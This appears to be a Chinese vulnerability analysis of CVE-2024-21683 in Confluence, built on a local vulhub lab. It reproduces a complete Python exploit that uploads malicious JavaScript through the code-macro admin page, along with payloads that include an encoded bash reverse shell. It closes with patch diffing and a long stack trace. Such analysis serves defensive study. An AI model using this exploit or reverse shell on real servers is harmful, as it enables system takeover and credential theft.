Confluence 是一款由 Atlassian 开发的协作软件,主要用于团队内部的信
Confluence 通常被用于企业环境中,以提高团队的生产力和沟通效率。
Confluence是Atlassian开发的一款团队协作软件,用于帮助团队成员共享知识、协作文档和管理项目。
Confluence 允许经过身份验证的攻击者执行任意代码,可能导致完全系统接管、部署恶意软件、系统配置更改和登录凭据窃取。
● 8.9.0
● 8.8.0 to 8.8.1
● 8.7.1 to 8.7.2
● 8.6.0 to 8.6.2
● 8.5.0 to 8.5.8 (LTS)
● 8.4.0 to 8.4.5
● 8.3.0 to 8.3.4
● 8.2.0 to 8.2.3
● 8.1.0 to 8.1.4
● 8.0.0 to 8.0.4
● 7.20.0 to 7.20.3
● 7.19.0 to 7.19.21 (LTS)
app="ATLASSIAN-Confluence"
本文使用vulhub的# CVE-2023-22527,vulhub之前提供的docker-compose没有开放远程debug,改一下,首先添加一个映射端口
version: '2'
services:
web:
image: vulhub/confluence:8.5.3
ports:
- "8090:8090"
- "5050:5050"
depends_on:
- db
db:
image: postgres:15.4-alpine
environment:
- POSTGRES_PASSWORD=postgres
- POSTGRES_DB=confluence
docker-compose up -d #启动容器后进入容器,执行命令:
sed -i '/export CATALINA_OPTS/iCATALINA_OPTS="-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=*:5050 ${CATALINA_OPTS}"' /opt/atlassian/confluence/bin/setenv.sh
# 接着执行
docker-compose restart
#具体安装请参考vulhub,安装完毕靶机就OK了。
#然后去
https://www.atlassian.com/zh/software/confluence/download-archives
#下一个8.5.3的zip包,解压,idea打开
把这些都添加为库,接着配置一个远程debug
这里调试环境也搭建好了
脚本梭哈参考:
https://github.com/W01fh4cker/CVE-2024-21683-RCE
python .CVE-2024-21683.py -u http://127.0.0.1:8090/ -au admin -ap admin -f exploit.js -n test
import argparse
import os
import requests
from bs4 import BeautifulSoup
defGeyAltToken(url, proxy, session):
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
}
alttoken_url = f"{url}/admin/plugins/newcode/configure.action"
resp = session.get(url=alttoken_url, headers=headers, verify=False, proxies=proxy, timeout=20)
if"atlassian-token"in resp.text:
soup = BeautifulSoup(resp.text, 'html.parser')
meta_tag = soup.find('meta', {'id': 'atlassian-token', 'name': 'atlassian-token'})
if meta_tag:
content_value = meta_tag.get('content')
return content_value
else:
print("Meta tag not found")
defLoginAsAdministrator(session, url, proxy, username, password):
login_url = url + "/dologin.action"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36",
"Content-Type": "application/x-www-form-urlencoded"
}
data = f"os_username={username}&os_password={password}&login=%E7%99%BB%E5%BD%95&os_destination=%2F"
session.post(url=login_url, headers=headers, data=data, proxies=proxy, verify=False, timeout=20)
defDoAuthenticate(session, url, proxy, password, alt_token):
login_url = url + "/doauthenticate.action"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36",
"Content-Type": "application/x-www-form-urlencoded"
}
data = f"atl_token={alt_token}&password={password}&authenticate=%E7%A1%AE%E8%AE%A4&destination=/admin/viewgeneralconfig.action"
session.post(url=login_url, headers=headers, data=data, proxies=proxy, verify=False, timeout=20)
defUploadEvilJsFile(session, url, proxy, jsFilename, jsFileContent, alt_token):
url = f"{url}/admin/plugins/newcode/addlanguage.action"
data = {
"atl_token": alt_token,
"newLanguageName": "test"
}
files = {
"languageFile": (
jsFilename, jsFileContent, "text/javascript")
}
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
}
session.post(url, headers=headers, data=data, files=files, verify=False, proxies=proxy, timeout=20)
defParseArgs():
parser = argparse.ArgumentParser(description="CVE-2024-21683-RCE")
parser.add_argument("-u", "--url", type=str, help="target url to check, eg: http://192.168.198.1:8090", required=True)
parser.add_argument("-p", "--proxy", type=str, default="http://127.0.0.1:8083", help="proxy url, eg: http://127.0.0.1:8083", required=False)
parser.add_argument("-au", "--admin-username", type=str, help="The username of the user who is in the Administrators group", required=True)
parser.add_argument("-ap", "--admin-password", type=str, help="The password of the user who is in the Administrators group", required=True)
parser.add_argument("-f", "--file", type=str, help="exploit file", default="exploit.js", required=True)
parser.add_argument("-n", "--name", type=str, help="newLanguageName", default="test", required=True)
return parser.parse_args()
if __name__ == '__main__':
args = ParseArgs()
# 这里不管传不传-p都会加上代理,所以改了
proxy = {}
session = requests.session()
jsfn = os.path.basename(args.file)
jsfc = open(args.file, "r", encoding="utf-8").read()
LoginAsAdministrator(session, args.url.strip("/"), proxy, args.admin_username, args.admin_password)
alt_token = GeyAltToken(args.url.strip("/"), proxy, session)
DoAuthenticate(session, args.url.strip("/"), proxy, args.admin_password, alt_token)
UploadEvilJsFile(session, args.url.strip("/"), proxy, jsfn, jsfc, alt_token)
// new java.lang.ProcessBuilder["(java.lang.String[])"](["calc.exe"]).start()
// 由于是docker起的,这里创建文件为演示
new java.lang.ProcessBuilder["(java.lang.String[])"](["bash", "-c","touch /tmp/succ"]).start()
// 反弹shell如下
new java.lang.ProcessBuilder["(java.lang.String[])"](["bash", "-c","{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvMTEyMjMgMD4mMQ==}|{base64,-d}|{bash,-i}"]).start();
手动的话就,登录后台 -- 站点管理 -- 配置代码宏
把上面的 js 传进去即可,前端显示什么不用管,实际已经成功执行
confluence补丁是带版本号的,idea直接diff看不出来,写个脚本去掉版本号
import os
import shutil
defmain():
confluence_lib_path = r"D:atlassian-confluence-8.5.3atlassian-confluence-8.5.3confluenceWEB-INF"
lib_path = rf"{confluence_lib_path}atlassian-bundled-plugins"
no_version_lib_path = rf"{confluence_lib_path}no_version_" + lib_path.split('\')[-1]
ifnot os.path.exists(no_version_lib_path):
os.mkdir(no_version_lib_path)
for root, dirs, files in os.walk(lib_path):
for old_filename in files:
version = old_filename.split('-')[-1]
new_filename = old_filename.replace(f'-{version}', '') + '.' + old_filename.split('.')[-1]
shutil.copyfile(rf'{lib_path}{old_filename}', rf'{no_version_lib_path}{new_filename}')
if __name__ == '__main__':
main()
新版的也运行一个就可以了,然后使用idea对比代码。根据官方披露:
[CONFSERVER-95832] RCE (Remote Code Execution) in Confluence Data Center and Server - Create and track feature requests for Atlassian products. https://jira.atlassian.com/browse/CONFSERVER-95832
可知路由为admin/plugins/newcode/addlanguage.action
,jar 包:newcode-macro-plugin-17.19.3.jar
com.atlassian.confluence.ext.code.languages.impl.RhinoLanguageParser#parseLanguage
打断
这里拼接了上传的js,结果为
var brushName;
var brushAliases;
varSyntaxHighlighter = function() {
var sh = {
brushes : {},
readBrushes : function () {
//Find all brushes
for (var brush in SyntaxHighlighter.brushes)
{
brushAliases = SyntaxHighlighter.brushes[brush].aliases;
brushName = "" + brush;
}
}
}
sh.Highlighter = function()
{
};
return sh;
}();
new java.lang.ProcessBuilder["(java.lang.String[])"](["bash", "-c","touch /tmp/succ"]).start()
SyntaxHighlighter.readBrushes();
跟到org.mozilla.javascript.Context#compileImpl
将 js 转为 ast
继续往下,这里进去
将 js 转为 字节码。走啊走,跟到org.mozilla.javascript.optimizer.Codegen#createScriptObject
实例化刚才转的类
最后走到org.mozilla.javascript.Context#evaluateString
进行调用。
补丁修复是Scriptable scope = cx.initSafeStandardObjects((ScriptableObject)null, true);
,initSafeStandardObjects
通过创建一个没有危险功能的标准对象来限制代码执行。
整个堆栈为:
evaluateString:1136, Context (org.mozilla.javascript), Context.java
parseLanguage:79, RhinoLanguageParser (com.atlassian.confluence.ext.code.languages.impl), RhinoLanguageParser.java
parseRegisteredLanguage:121, RhinoLanguageParser (com.atlassian.confluence.ext.code.languages.impl), RhinoLanguageParser.java
installLanguage:61, RegisteredLanguageInstallerImpl (com.atlassian.confluence.ext.code.languages.impl), RegisteredLanguageInstallerImpl.java
addLanguage:206, ConfigureNewcodeAction (com.atlassian.confluence.ext.code.config), ConfigureNewcodeAction.java
invoke0:-1, NativeMethodAccessorImpl (jdk.internal.reflect), NativeMethodAccessorImpl.java
invoke:62, NativeMethodAccessorImpl (jdk.internal.reflect), NativeMethodAccessorImpl.java
invoke:43, DelegatingMethodAccessorImpl (jdk.internal.reflect), DelegatingMethodAccessorImpl.java
invoke:566, Method (java.lang.reflect), Method.java
invokeMethodInsideSandbox:1266, OgnlRuntime (ognl), OgnlRuntime.java
invokeMethod:1251, OgnlRuntime (ognl), OgnlRuntime.java
callAppropriateMethod:1969, OgnlRuntime (ognl), OgnlRuntime.java
callMethod:68, ObjectMethodAccessor (ognl), ObjectMethodAccessor.java
callMethodWithDebugInfo:98, XWorkMethodAccessor (com.opensymphony.xwork2.ognl.accessor), XWorkMethodAccessor.java
callMethod:90, XWorkMethodAccessor (com.opensymphony.xwork2.ognl.accessor), XWorkMethodAccessor.java
callMethod:2045, OgnlRuntime (ognl), OgnlRuntime.java
getValueBody:97, ASTMethod (ognl), ASTMethod.java
evaluateGetValueBody:212, SimpleNode (ognl), SimpleNode.java
getValue:258, SimpleNode (ognl), SimpleNode.java
getValue:537, Ognl (ognl), Ognl.java
getValue:501, Ognl (ognl), Ognl.java
execute:531, OgnlUtil$3 (com.opensymphony.xwork2.ognl), OgnlUtil.java
compileAndExecuteMethod:583, OgnlUtil (com.opensymphony.xwork2.ognl), OgnlUtil.java
callMethod:529, OgnlUtil (com.opensymphony.xwork2.ognl), OgnlUtil.java
invokeAction:438, DefaultActionInvocation (com.opensymphony.xwork2), DefaultActionInvocation.java
invokeActionOnly:293, DefaultActionInvocation (com.opensymphony.xwork2), DefaultActionInvocation.java
invoke:254, DefaultActionInvocation (com.opensymphony.xwork2), DefaultActionInvocation.java
intercept:16, XWorkProfilingInterceptor (com.atlassian.xwork.interceptors), XWorkProfilingInterceptor.java
invoke:249, DefaultActionInvocation (com.opensymphony.xwork2), DefaultActionInvocation.java
doIntercept:181, DefaultWorkflowInterceptor (com.opensymphony.xwork2.interceptor), DefaultWorkflowInterceptor.java
intercept:99, MethodFilterInterceptor (com.opensymphony.xwork2.interceptor), MethodFilterInterceptor.java
intercept:25, ConfluenceWorkflowInterceptor (com.atlassian.confluence.core), ConfluenceWorkflowInterceptor.java
invoke:249, DefaultActionInvocation (com.opensymphony.xwork2), DefaultActionInvocation.java
doIntercept:263, ValidationInterceptor (com.opensymphony.xwork2.validator), ValidationInterceptor.java
intercept:99, MethodFilterInterceptor (com.opensymphony.xwork2.interceptor), MethodFilterInterceptor.java
invoke:249, DefaultActionInvocation (com.opensymphony.xwork2), DefaultActionInvocation.java
intercept:44, CaptchaInterceptor (com.atlassian.confluence.security.interceptors), CaptchaInterceptor.java
invoke:249, DefaultActionInvocation (com.opensymphony.xwork2), DefaultActionInvocation.java
intercept:16, XWorkProfilingInterceptor (com.atlassian.xwork.interceptors), XWorkProfilingInterceptor.java
invoke:249, DefaultActionInvocation (com.opensymphony.xwork2), DefaultActionInvocation.java
intercept:117, XsrfTokenInterceptor (com.atlassian.xwork.interceptors), XsrfTokenInterceptor.java
intercept:30, ConfluenceXsrfTokenInterceptor (com.atlassian.confluence.xwork), ConfluenceXsrfTokenInterceptor.java
invoke:249, DefaultActionInvocation (com.opensymphony.xwork2), DefaultActionInvocation.java
intercept:74, ConfluenceLicenseInterceptor (com.atlassian.confluence.core), ConfluenceLicenseInterceptor.java
invoke:249, DefaultActionInvocation (com.opensymphony.xwork2), DefaultActionInvocation.java
intercept:23, HttpRequestStatsInterceptor (com.atlassian.confluence.xwork), HttpRequestStatsInterceptor.java
invoke:249, DefaultActionInvocation (com.opensymphony.xwork2), DefaultActionInvocation.java
intercept:38, MessageHolderInterceptor (com.atlassian.confluence.validation), MessageHolderInterceptor.java
invoke:249, DefaultActionInvocation (com.opensymphony.xwork2), DefaultActionInvocation.java
intercept:19, EventPublisherInterceptor (com.atlassian.confluence.event), EventPublisherInterceptor.java
invoke:249, DefaultActionInvocation (com.opensymphony.xwork2), DefaultActionInvocation.java
intercept:43, LoggingContextInterceptor (com.atlassian.confluence.util), LoggingContextInterceptor.java
invoke:249, DefaultActionInvocation (com.opensymphony.xwork2), DefaultActionInvocation.java
intercept:21, CancellingInterceptor (com.atlassian.confluence.core), CancellingInterceptor.java
invoke:249, DefaultActionInvocation (com.opensymphony.xwork2), DefaultActionInvocation.java
intercept:122, RestrictHttpMethodInterceptor (com.atlassian.xwork.interceptors), RestrictHttpMethodInterceptor.java
invoke:249, DefaultActionInvocation (com.opensymphony.xwork2), DefaultActionInvocation.java
intercept:60, WebSudoInterceptor (com.atlassian.confluence.security.websudo), WebSudoInterceptor.java
invoke:249, DefaultActionInvocation (com.opensymphony.xwork2), DefaultActionInvocation.java
intercept:37, ThemeContextInterceptor (com.atlassian.confluence.themes), ThemeContextInterceptor.java
invoke:249, DefaultActionInvocation (com.opensymphony.xwork2), DefaultActionInvocation.java
intercept:97, PermissionCheckInterceptor (com.atlassian.confluence.security.actions), PermissionCheckInterceptor.java
invoke:249, DefaultActionInvocation (com.opensymphony.xwork2), DefaultActionInvocation.java
intercept:19, BootstrapAwareInterceptor (com.atlassian.confluence.setup.struts), BootstrapAwareInterceptor.java
invoke:249, DefaultActionInvocation (com.opensymphony.xwork2), DefaultActionInvocation.java
doIntercept:175, PrepareInterceptor (com.opensymphony.xwork2.interceptor), PrepareInterceptor.java
intercept:99, MethodFilterInterceptor (com.opensymphony.xwork2.interceptor), MethodFilterInterceptor.java
invoke:249, DefaultActionInvocation (com.opensymphony.xwork2), DefaultActionInvocation.java
intercept:50, UserAwareInterceptor (com.atlassian.confluence.user.actions), UserAwareInterceptor.java
invoke:249, DefaultActionInvocation (com.opensymphony.xwork2), DefaultActionInvocation.java
intercept:37, CommentAwareInterceptor (com.atlassian.confluence.pages.actions), CommentAwareInterceptor.java
invoke:249, DefaultActionInvocation (com.opensymphony.xwork2), DefaultActionInvocation.java
intercept:49, PageAwareInterceptor (com.atlassian.confluence.pages.actions), PageAwareInterceptor.java
invoke:249, DefaultActionInvocation (com.opensymphony.xwork2), DefaultActionInvocation.java
intercept:70, SpaceAwareInterceptor (com.atlassian.confluence.spaces.actions), SpaceAwareInterceptor.java
invoke:249, DefaultActionInvocation (com.opensymphony.xwork2), DefaultActionInvocation.java
intercept:30, ConfluenceAccessInterceptor (com.atlassian.confluence.security.interceptors), ConfluenceAccessInterceptor.java
invoke:249, DefaultActionInvocation (com.opensymphony.xwork2), DefaultActionInvocation.java
intercept:21, FlashScopeInterceptor (com.atlassian.confluence.xwork), FlashScopeInterceptor.java
invoke:249, DefaultActionInvocation (com.opensymphony.xwork2), DefaultActionInvocation.java
intercept:167, ServletConfigInterceptor (org.apache.struts2.interceptor), ServletConfigInterceptor.java
invoke:249, DefaultActionInvocation (com.opensymphony.xwork2), DefaultActionInvocation.java
intercept:27, LastModifiedInterceptor (com.atlassian.confluence.core.actions), LastModifiedInterceptor.java
invoke:249, DefaultActionInvocation (com.opensymphony.xwork2), DefaultActionInvocation.java
intercept:44, ConfluenceAutowireInterceptor (com.atlassian.confluence.core), ConfluenceAutowireInterceptor.java
invoke:249, DefaultActionInvocation (com.opensymphony.xwork2), DefaultActionInvocation.java
doIntercept:140, ParametersInterceptor (com.opensymphony.xwork2.interceptor), ParametersInterceptor.java
intercept:99, MethodFilterInterceptor (com.opensymphony.xwork2.interceptor), MethodFilterInterceptor.java
invoke:249, DefaultActionInvocation (com.opensymphony.xwork2), DefaultActionInvocation.java
invokeAndHandleExceptions:63, TransactionalInvocation (com.atlassian.xwork.interceptors), TransactionalInvocation.java
invokeInTransaction:53, TransactionalInvocation (com.atlassian.xwork.interceptors), TransactionalInvocation.java
intercept:50, XWorkTransactionInterceptor (com.atlassian.xwork.interceptors), XWorkTransactionInterceptor.java
invoke:249, DefaultActionInvocation (com.opensymphony.xwork2), DefaultActionInvocation.java
intercept:60, SetupIncompleteInterceptor (com.atlassian.confluence.xwork), SetupIncompleteInterceptor.java
invoke:249, DefaultActionInvocation (com.opensymphony.xwork2), DefaultActionInvocation.java
intercept:26, SecurityHeadersInterceptor (com.atlassian.confluence.security.interceptors), SecurityHeadersInterceptor.java
invoke:249, DefaultActionInvocation (com.opensymphony.xwork2), DefaultActionInvocation.java
intercept:16, XWorkProfilingInterceptor (com.atlassian.xwork.interceptors), XWorkProfilingInterceptor.java
invoke:249, DefaultActionInvocation (com.opensymphony.xwork2), DefaultActionInvocation.java
execute:48, StrutsActionProxy (org.apache.struts2.factory), StrutsActionProxy.java
serviceAction:106, ConfluenceStrutsDispatcher (com.atlassian.confluence.impl.struts), ConfluenceStrutsDispatcher.java
executeAction:79, ExecuteOperations (org.apache.struts2.dispatcher), ExecuteOperations.java
doFilter:77, StrutsExecuteFilter (org.apache.struts2.dispatcher.filter), StrutsExecuteFilter.java
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:39, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.java
lambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.java
doFilter:-1, 1042570324 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2637), Unknown Source
doFilter:52, IncludeResourcesFilter (com.atlassian.confluence.plugins.baseurl), IncludeResourcesFilter.java
doFilter:32, AbstractHttpFilter (com.atlassian.core.filters), AbstractHttpFilter.java
doFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.java
doFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.java
lambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.java
doFilter:-1, 1042570324 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2637), Unknown Source
doFilter:36, BotKillerFilter (com.atlassian.labs.botkiller), BotKillerFilter.java
doFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.java
doFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.java
lambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.java
doFilter:-1, 1042570324 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2637), Unknown Source
doFilter:24, ContextFilter (com.atlassian.applinks.core.rest.context), ContextFilter.java
doFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.java
doFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.java
lambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.java
doFilter:-1, 1042570324 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2637), Unknown Source
doFilter:24, ContextFilter (com.atlassian.applinks.core.rest.context), ContextFilter.java
doFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.java
doFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.java
lambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.java
doFilter:-1, 1042570324 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2637), Unknown Source
doFilter:24, ContextFilter (com.atlassian.applinks.core.rest.context), ContextFilter.java
doFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.java
doFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.java
lambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.java
doFilter:-1, 1042570324 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2637), Unknown Source
doFilter:24, ContextFilter (com.atlassian.applinks.core.rest.context), ContextFilter.java
doFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.java
doFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.java
lambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.java
doFilter:-1, 1042570324 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2637), Unknown Source
doFilter:24, ContextFilter (com.atlassian.applinks.core.rest.context), ContextFilter.java
doFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.java
doFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.java
lambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.java
doFilter:-1, 1042570324 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2637), Unknown Source
doFilter:75, PulpFilter (com.atlassian.confluence.plugins.pulp), PulpFilter.java
doFilter:32, AbstractHttpFilter (com.atlassian.core.filters), AbstractHttpFilter.java
doFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.java
doFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.java
lambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.java
doFilter:-1, 1042570324 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2637), Unknown Source
doFilter:75, UniversalAnalyticsFilter (com.atlassian.analytics.client.filter), UniversalAnalyticsFilter.java
doFilter:33, AbstractHttpFilter (com.atlassian.analytics.client.filter), AbstractHttpFilter.java
doFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.java
doFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.java
lambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.java
doFilter:-1, 1042570324 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2637), Unknown Source
doFilter:32, ServingRequestsFilter (com.atlassian.mywork.client.filter), ServingRequestsFilter.java
doFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.java
doFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.java
lambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.java
doFilter:-1, 1042570324 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2637), Unknown Source
doFilter:77, OnboardingFilter (com.atlassian.confluence.efi), OnboardingFilter.java
doFilter:32, AbstractHttpFilter (com.atlassian.core.filters), AbstractHttpFilter.java
doFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.java
doFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.java
lambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.java
doFilter:-1, 1042570324 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2637), Unknown Source
doFilterInternal:101, ConfluenceAuthenticationFilter (com.atlassian.plugins.authentication.impl.web.filter.authentication), ConfluenceAuthenticationFilter.java
doFilter:29, AbstractJohnsonAwareFilter (com.atlassian.plugins.authentication.impl.web.filter), AbstractJohnsonAwareFilter.java
doFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.java
doFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.java
lambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.java
doFilter:-1, 1042570324 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2637), Unknown Source
doFilter:32, PrettyUrlsSiteMeshFixupFilter (com.atlassian.prettyurls.filter), PrettyUrlsSiteMeshFixupFilter.java
doFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.java
doFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.java
lambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.java
doFilter:-1, 1042570324 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2637), Unknown Source
doFilter:55, PrettyUrlsDispatcherFilter (com.atlassian.prettyurls.filter), PrettyUrlsDispatcherFilter.java
doFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.java
doFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.java
lambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.java
doFilter:-1, 1042570324 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2637), Unknown Source
doFilter:80, PrettyUrlsSiteMeshFilter (com.atlassian.prettyurls.filter), PrettyUrlsSiteMeshFilter.java
doFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.java
doFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.java
lambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.java
doFilter:-1, 1042570324 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2637), Unknown Source
doFilter:51, PrettyUrlsMatcherFilter (com.atlassian.prettyurls.filter), PrettyUrlsMatcherFilter.java
doFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.java
doFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.java
lambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.java
doFilter:-1, 1042570324 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2637), Unknown Source
doFilter:72, MobileAppWebViewFilter (com.atlassian.confluence.plugins.mobile.filter), MobileAppWebViewFilter.java
doFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.java
doFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.java
doFilter:56, ServletFilterModuleContainerFilter (com.atlassian.plugin.servlet.filter), ServletFilterModuleContainerFilter.java
doFilter:44, ServletFilterModuleContainerFilter (com.atlassian.plugin.servlet.filter), ServletFilterModuleContainerFilter.java
doFilter:50, JohnsonServletFilterModuleContainerFilter (com.atlassian.johnson.plugin.servlet.filter), JohnsonServletFilterModuleContainerFilter.java
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:64, MessagesDecoratorFilter (com.atlassian.confluence.util.message), MessagesDecoratorFilter.java
doFilter:32, AbstractHttpFilter (com.atlassian.core.filters), AbstractHttpFilter.java
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
obtainContent:181, SiteMeshFilter (com.opensymphony.sitemesh.webapp), SiteMeshFilter.java
doFilter:85, SiteMeshFilter (com.opensymphony.sitemesh.webapp), SiteMeshFilter.java
doFilter:48, ProfilingSiteMeshFilter (com.atlassian.confluence.util.profiling), ProfilingSiteMeshFilter.java
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:39, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.java
lambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.java
doFilter:-1, 1042570324 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2637), Unknown Source
doFilter:46, ReadWriteScopeFilter (com.atlassian.oauth2.scopes.web), ReadWriteScopeFilter.java
doFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.java
doFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.java
lambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.java
doFilter:-1, 1042570324 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2637), Unknown Source
doFilter:46, AbstractThreadNamingFilter (com.atlassian.troubleshooting.thready.filter), AbstractThreadNamingFilter.java
doFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.java
doFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.java
lambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.java
doFilter:-1, 1042570324 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2637), Unknown Source
doFilter:39, ConfluenceActivityFilter (com.atlassian.confluence.util.profiling), ConfluenceActivityFilter.java
